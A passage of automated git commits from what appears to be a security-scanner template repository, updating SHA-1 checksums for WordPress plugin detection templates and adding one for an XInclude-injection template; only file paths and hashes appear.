+http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:15ed65f147dc4078f91aea3ed5774d7a7bfad706 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:033222df0541159049c3c11ae9300732b8201243 -http/technologies/wordpress/plugins/mailpoet.yaml:479beb07ff02193816a10a1a91992d0395090295 -http/technologies/wordpress/plugins/maintenance.yaml:570043796c51cd0a308901885b7b48e52769b980 -http/technologies/wordpress/plugins/mainwp-child.yaml:7b6abbbc15047dc952985c30399ca942381557bc -http/technologies/wordpress/plugins/malcare-security.yaml:8eb9f5fad314a36f22f3eb4abf03aaacafb80dc6 -http/technologies/wordpress/plugins/megamenu.yaml:98cf903793c60160753fcb6139c0d5b33080a643 -http/technologies/wordpress/plugins/members.yaml:c4667b0ed20dd32b3b436e96b8f14f53ab21a66c -http/technologies/wordpress/plugins/meta-box.yaml:03a391a62de5897c54e91ab7c2605d95bfb37e7e -http/technologies/wordpress/plugins/metform.yaml:6faca0988d6a97ccadfba72b45342dd2e2d052be -http/technologies/wordpress/plugins/ml-slider.yaml:986f9bc6f31968e5983bf58ef808beea2287f254 -http/technologies/wordpress/plugins/newsletter.yaml:0d317cde0bcbd92143e78c545d8cb9e6de25e8d7 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:1e8a66f9219be05411aa7f8ad0deebafe0b0ced0 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:1cfbf41558073abfefcc7cbfefb11bd4f0d255e8 -http/technologies/wordpress/plugins/ninja-forms.yaml:a1cb2b389bd724020735c9e7f9e3b2fa5890245d -http/technologies/wordpress/plugins/ocean-extra.yaml:340a3734ca9bf192ad82362355e437efeff71950 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:cae0e9d69dedc7a0a0819b3a387c35d01f70d423 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:d03fb41ddff348673ad9a15373d7f3a9f03716c1 -http/technologies/wordpress/plugins/optinmonster.yaml:0bbb43608df51dc6b6d511ff5da8f4df77cc8b05 -http/technologies/wordpress/plugins/otter-blocks.yaml:105bebb6c141665de82d3d6f535895049117414c -http/technologies/wordpress/plugins/password-protected.yaml:76bc9c579da3994b8b4ddfaa57c8e620b7f5d631 -http/technologies/wordpress/plugins/pdf-embedder.yaml:195a8aa42208810c40af48ee93bcb5f1bb0b7d3f +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:546d9d498a2b61300f1c6a9b27780f906e4b494c -http/technologies/wordpress/plugins/pixelyoursite.yaml:d3f65feb4e5ce979f07c71c25ce849aa56426378 -http/technologies/wordpress/plugins/polylang.yaml:f847bf4d6c830ad0424060587d00bdcfc1a3f689 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:49579975d5f7dade45c84f460d6484d71e9806d7 -http/technologies/wordpress/plugins/post-smtp.yaml:03493882dcd57e25abb2d6560496e245a474d0f6 -http/technologies/wordpress/plugins/post-types-order.yaml:9f9ac441d2ca6671e98971960bf31e7f668072d6 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ff6a8c2ed6fe0fa3cb70eb8465a024be3be84916 -http/technologies/wordpress/plugins/pretty-link.yaml:03d1a4a60ba4bc21b09bfed52f8e516542707d3b -http/technologies/wordpress/plugins/really-simple-captcha.yaml:6f82ca7b4e1a5fc6d584249e048e9333ea0c7547 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:0d8f6f8df59e645ffd624de7a7c40662afe5f294 -http/technologies/wordpress/plugins/redirection.yaml:9cf9496bf604610516a57b1ab0153281fc8f868c -http/technologies/wordpress/plugins/redux-framework.yaml:b3ce06c9301cda73be9373d11ac5976c59274aec -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:1675ff4488b59edffd291aeeec5cc77c03b99443 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:eda1be4651f6e5473888cb91b7fa096723ca3536 -http/technologies/wordpress/plugins/safe-svg.yaml:c4e9f8a5d7ae80bc58038171e221df9043c7276f -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:8c5785ca835e5d7407258ed99c3a1acf7728d9c1 -http/technologies/wordpress/plugins/sg-cachepress.yaml:e4cf8b3ebc5094f167bbb77d59c091c0e2ee8f11 -http/technologies/wordpress/plugins/sg-security.yaml:8f60b4eb3acbca0583f5a1e4413e68e2b0fe7c1a -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:5cd34fd919ce1b47431e7fb3dfbc11121378bb07 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:4cd69acaf847e8d8a649a732dfaf28e856f9742d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:387412824c075250c22fbc6566c36d41e06ad22a -http/technologies/wordpress/plugins/simple-history.yaml:2dcfa1ab535d544231d2d1f097be79c15b23fd0b +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:46fad30eea13bc5f1e337ca93138ccbf156f49e4 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:63bd2bbcee9fb09224793f4ccaa68a706ba9202e -http/technologies/wordpress/plugins/smart-slider-3.yaml:4da9062e6eef34e011e9b5819660931c92ca4173 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:92d6f732fd7dfee977b2078cf0b83eeb4b1b68e1 +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:bd247c94885b1da97dc51c13a56e7c84d894c761 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:5908cb3246dcdf46dc98b763184b8f01737a50a4 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:26afcb953d094462be68cd6dbba3c453c9e8862f -http/technologies/wordpress/plugins/svg-support.yaml:228cb4685e47ad452248f71f8df21e6ed4b85c60 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:4c155b7e950a03f7c47a0fb63e935f3d9507ccf1 -http/technologies/wordpress/plugins/tablepress.yaml:2b23c3886fc862c2ef12ccab4070237696bbfb63 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:c3a8b84fa14185e7e50827cc9805e6fb58622a36 -http/technologies/wordpress/plugins/templately.yaml:5ded2e937e4ea62a2623d98a5adabd8417e0827a -http/technologies/wordpress/plugins/the-events-calendar.yaml:53aba5273d5234c613787d2578052deb1c522185 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:2b4d2d3c2706a8736bd848f882e18bb587689859 +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:f7d9f8a3a14f7941e59ee2bd2b558ff04b319c84 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:102c37741c414c602dd78cdd634ec09d95e51f88 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:449866009f906df79fe07404ac1a254ac5fc22e0 -http/technologies/wordpress/plugins/under-construction-page.yaml:6c4df85ae871efa68ea2257df37f10bde8484bfa +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:f06e5cd807949214a2e1bbbc1977838ea35c842b +http/technologies/wordpress/plugins/updraftplus.yaml:ca4d717fe515b7eb6536411561bb5541b05681fa http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:cbce60e9328bf030c21ac8c8d0ea41159642974b +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:0cfc0e3735eb1da659169fe227bd71d64179ee8b -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:f0a69c5495e77c2239c46c7019250edb3a2982bc -http/technologies/wordpress/plugins/webp-express.yaml:eca47ae3852c045fcd314607bbdc88d3eaa510a1 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:f50ea67c8724e1f2dbe53faf45375fa13b1b0da1 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:c786924a44be001e6fce85d595e24c93a99c7cc6 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:5d5bf62c0b250554cbb5f93e7dcde37d86c97d58 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:d4b3d24c787103507e69e531df3f8a0e00526fe4 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:ea3b3295621adb8363b475bc6491b1995e20c2d4 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:a331299a39ae782c77f5de19b60ed6cfa91051eb -http/technologies/wordpress/plugins/woocommerce-payments.yaml:b6bf5864e2c68e95d85405d1286f3e45d527a4fa -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:0b7930c53dcc882bc1b7412caf3fa8b66b164211 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:cd5091c9e6ee0126a93b5d604d44d6795dd5203a -http/technologies/wordpress/plugins/woocommerce-services.yaml:05769605c732c4f1e02aea58e358f92849bb9f8b -http/technologies/wordpress/plugins/woocommerce.yaml:2d72bdd00a4cdb16ded3bfdad8f7801f346d7729 -http/technologies/wordpress/plugins/wordfence.yaml:442e37613c84d3d47a654770ab9b582c0403d7cc -http/technologies/wordpress/plugins/wordpress-importer.yaml:e201c138408bbc7ad3d7b61bee8f4770a42da522 -http/technologies/wordpress/plugins/wordpress-seo.yaml:10487a6aa674b683ab952ab331f85cd9384fb96d +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:0df8d691f466192c44b622742cc5e3c17a00a00e -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:832456356272859f3c8acff571031b39ce1c39c7 -http/technologies/wordpress/plugins/wp-file-manager.yaml:0921154713a5bd558db8e7da4e3de729e5d7140d -http/technologies/wordpress/plugins/wp-google-maps.yaml:5260d62b101878fcc2531c1856601e4e7a3b3fbf -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6613dcc99233b403ae7f1f0c316fdc4f3f3ed678 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:2824ce4b4efe0b107536cf455e2118c5c8ad1a26 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:b42f34127003dbb9fa45d09c3ce7d146338be1b0 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:b429a5a57936afc6f63bede3b054bba643df4ac3 -http/technologies/wordpress/plugins/wp-optimize.yaml:cf97fa9b78f80ca2d1a9786fe8f47783e6ff940d -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2054f7f76506747382e4c9aa9ec0edacfb9f4eb7 -http/technologies/wordpress/plugins/wp-reset.yaml:19bcc58b8c41afffb8ce1f0bab0c509fd06c36dd -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:b9bbe07931263bf596f8e29673798229f6cdf506 -http/technologies/wordpress/plugins/wp-rollback.yaml:262bd09571a418cdaaa54f01979933b30b554b54 -http/technologies/wordpress/plugins/wp-seopress.yaml:d44bcfd8c1527365b2745c18d5de0e6fa559debc -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:f26d9e2f1a96e63595709cf52049f720b4500f3e -http/technologies/wordpress/plugins/wp-smushit.yaml:a829f833ef204f8a9bbaa0f6a7559578e111de2d -http/technologies/wordpress/plugins/wp-statistics.yaml:943bb8c83d4ce8c1aaf53eceb5ab9644d5bcad0f -http/technologies/wordpress/plugins/wp-super-cache.yaml:ce4b9907460a249ad6fee48a2780bb9131ea25a5 +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:e0a0c1701421bf71be91f59716cb30526f98c215 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:2837da1ae3072b0da32f10789dd5aab0d39a466d -http/technologies/wordpress/plugins/wpforms-lite.yaml:72c7143bbeffd9e0d85d11bb02bc0c90c4d33b63 -http/technologies/wordpress/plugins/wps-hide-login.yaml:a1a68ac536eab88bab3379fcbb1803cdcaea4223 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:636d5b41ad8ac87a4f9c96cbee56eb54fecad3b3 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:1fcff3d3b881c0f9dcf700cf7751c5297ee289ce +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:60190f40e03f0df3d4603ccd39a721f0ae13a5a5 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8818,7 +8818,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:d2b9e94525d640557a10fce735fa729196ff3ac3 +templates-checksum.txt:e788d05a6db320acb95c41174221d5b4afc18722 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2af257dd234a8d167bae666f012de35c44de8412 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 3 Jul 2024 10:30:28 +0000 Subject: [PATCH 0818/1841] Auto Generated Templates Checksum [Wed Jul 3 10:30:28 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a5e23aac6f..b775e26d5c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -244,6 +244,7 @@ dast/vulnerabilities/sqli/time-based-sqli.yaml:c0bf67162953a70d11c3915a49e2a19a4 dast/vulnerabilities/ssrf/blind-ssrf.yaml:12e23b0638b7f0121088e6e0b9ed906a37a6fe26 dast/vulnerabilities/ssrf/response-ssrf.yaml:7860ce6af5f3856162386fc7c86d2da2ec4ed661 dast/vulnerabilities/ssti/reflection-ssti.yaml:cfefbcfec9ce4e1de812f0409c4a2461a4a7b851 +dast/vulnerabilities/xinclude-injection.yaml:c2c6be46e7fe616aa21e5ffc06668c91babbe2e5 dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253 dast/vulnerabilities/xss/reflected-xss.yaml:46717ee593fe9809385572b82e9b1a7265c3cf6f dast/vulnerabilities/xxe/generic-xxe.yaml:c0dfcc8fa1d2879f2985806eff40727036cdf51a @@ -8818,7 +8819,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e788d05a6db320acb95c41174221d5b4afc18722 +templates-checksum.txt:f35214b6bd46c1d865f507db1c94db592d293f85 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From cd39b864cae449c245fb0aef1d15d87cd6b7b3e8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 3 Jul 2024 10:31:23 +0000 Subject: [PATCH 0819/1841] Auto Template Signing [Wed Jul 3 10:31:23 UTC 2024] :robot: --- http/default-logins/mantisbt/mantisbt-anonymous-login.yaml | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + 